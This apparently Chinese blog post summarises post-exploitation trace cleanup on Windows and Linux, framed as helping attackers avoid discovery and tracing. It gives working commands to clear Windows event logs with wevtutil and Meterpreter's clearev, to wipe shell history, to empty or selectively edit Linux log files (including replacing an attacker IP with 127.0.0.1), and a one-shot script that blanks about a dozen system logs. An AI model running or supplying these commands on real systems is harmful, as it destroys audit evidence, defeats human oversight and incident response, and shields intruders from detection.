linux渗透后清除日志,后渗透阶段清理痕迹方式总结
一、概述:
在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。
二、windows
有远程桌面权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志
wevtutil工具命令行清除:
wevtutil el 列出系统中所有日志名称
wevtutil cl system 清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security 清理安全日志
meterperter自带清除日志功能:
clearev 清除windows中的应用程序日志、系统日志、安全日志
清除recent:
或直接打开C:\Users\Administrator\Recent并删除所有内容
或在命令行中输入del /f /s /q “%userprofile%\Recent*.*
三、linux
清除命令历史记录
histroy -r #删除当前会话历史记录
history -c #删除内存中的所有命令历史
rm .bash_history #删除历史文件中的内容
HISTZISE=0 #通过设置历史命令条数来清除所有历史记录
在隐蔽的位置执行命令,使用vim打开文件执行命令:
:set history=0
:!command
linux日志文件
/var/run/utmp 记录现在登入的用户
/var/log/wtmp 记录用户所有的登入和登出
/var/log/lastlog 记录每一个用户最后登入时间
/var/log/btmp 记录错误的登入尝试
/var/log/auth.log 需要身份确认的操作
/var/log/secure 记录安全相关的日志信息
/var/log/maillog 记录邮件相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
/var/log/cron 记录定时任务相关的日志信息
/var/log/spooler 记录UUCP和news设备相关的日志信息
/var/log/boot.log 记录守护进程启动和停止相关的日志消息
完全删除日志文件
cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename
针对性删除日志文件
删除当天日志
sed -i '/当天日期/'d filename
篡改日志文件
将所有170.170.64.17ip替换为127.0.0.1
sed -i 's/170.170.64.17/127.0.0.1/g'
一键清除脚本:
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c
标签:痕迹,log,渗透,清除,清理,echo,var,日志,filename
来源: https://www.cnblogs.com/yyxianren/p/14553464.html
linux渗透后清除日志,后渗透阶段清理痕迹方式总结相关推荐
- linux清理日志 hack,Linux系统的LOG日志文件及入侵后日志的清除
UNIX网管员主要是靠系统的LOG,来获得入侵的痕迹.当然也有第三方工具记录入侵系统的 痕迹,UNIX系统存放LOG文件,普通位置如下: /usr/adm - 早期版本的UNIX /var/adm - ...
- 【实施工程师】Linux查看日志后100行
[实施工程师]Linux查看日志后100行 tail -f 实时查看日志文件tail -f 日志文件log tail - 100f 实时查看日志文件 后一百行tail -f -n 100 catali ...
- 渗透测试入门20之渗透测试七阶段
PTES标准中的渗透测试阶段 渗透测试执行标准(PTES:PenetrationTesting Executjion Standard)正在对渗透测试的重新定义,新标准的核心理念是通 ...
- Linux 定时清除日志 Log
一.原因 写这篇的原因是项目中log没有定时清除,服务器上项目是用脚本启动,log文件只会在启动时生成一次,这时,由于项目在不断运行中,导致log越来越大.如果删除log文件,还得把项目停掉在启动,这 ...
- linux下git修改密码后无法使用,git push后账号密码输出错误和修改
Git入门和常用命令详解 Git入门和常用命令详解 拉取远程仓库到本地: git clone 地址 [重命名] 查看提交历史: git log 查看工作目录当前状态: git status 暂存文件/ ...
- [踩坑篇]logrotate切割日志后,日志还是写在老日志文件中
背景 公司的生产环境中,使用gunicorn部署后端后端django服务,每天会产生很多前端掉调用后端api的日志文件,为了方便管理这些文件,使用了Linux自带的日志切割工具logrotate,每天 ...
- Linux I/O操作fsync后数据就安全了么(fsync、fwrite、fflush、mmap、write barriers详解)
系列文章 Linux I/O操作fsync后数据就安全了么(fsync.fwrite.fflush.mmap.write barriers详解) Linux I/O系列之直接内存(Direct IO) ...
- 〖Linux〗Kubuntu KDE开机后总是提示“system program problem detected”的解决方法
[Linux]Kubuntu KDE开机后总是提示"system program problem detected"的解决方法 参考文章: (1)[Linux]Kubuntu KD ...
- Kali Linux安全渗透教程1.1Linux安全渗透简介
Kali Linux安全渗透教程1.1Linux安全渗透简介 渗透测试是对用户信息安全措施积极评估的过程.通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如设计缺陷.技术缺陷.本章将 ...
- Linux下Nginx编译安装后的开机自启动设置
Linux下Nginx编译安装后的开机自启动设置 一.查看当前Nginx启动状态 二.而配置Nginx相关服务文件 三 .设置nginx命令 四.设置开机启动 五.测试开机启动 一.查看当前Nginx ...
最新文章
- 207. Course Schedule 210. Course Schedule II
- POJ 3613 快速幂+Floyd变形(求限制k条路径的最短路)
- python之Django部署
- 数据中心加速,一文说清FPGA与GPU、ASIC目前的竞争格局
- 图神经网络(二)GCN的性质(3)GCN是一个低通滤波器
- 便利蜂发布双11战报:当天外卖订单最多的是这个城市
- spark学习-43-Spark的BlockManager
- can总线配置读入是什么意思_CAN总线基础知识学习笔记
- jquery原型方法map的使用和源码分析
- Oracle union all和order by一起使用
- python怎么读取excel-python如何读写excel文件
- 在linux下安装iNode校园客户端
- zotero无法同步caj文件 attachments skipped because they are top-level items, file does not exist
- java,Hash冲突及解决办法
- [Error]compileSdkVersion is not specified. Please add it to build.gradle
- MongoDB下载安装教程(Windows)
- 四路模拟高清解码,CVI,四通道多合一同轴高清解码芯片方案
- 搜索引擎基本工作原理
- 2021年中式面点师(初级)证考试及中式面点师(初级)模拟考试题
- Computer Vision 杂志对何恺明 Rethinking ImageNet Pre-training 的最新评论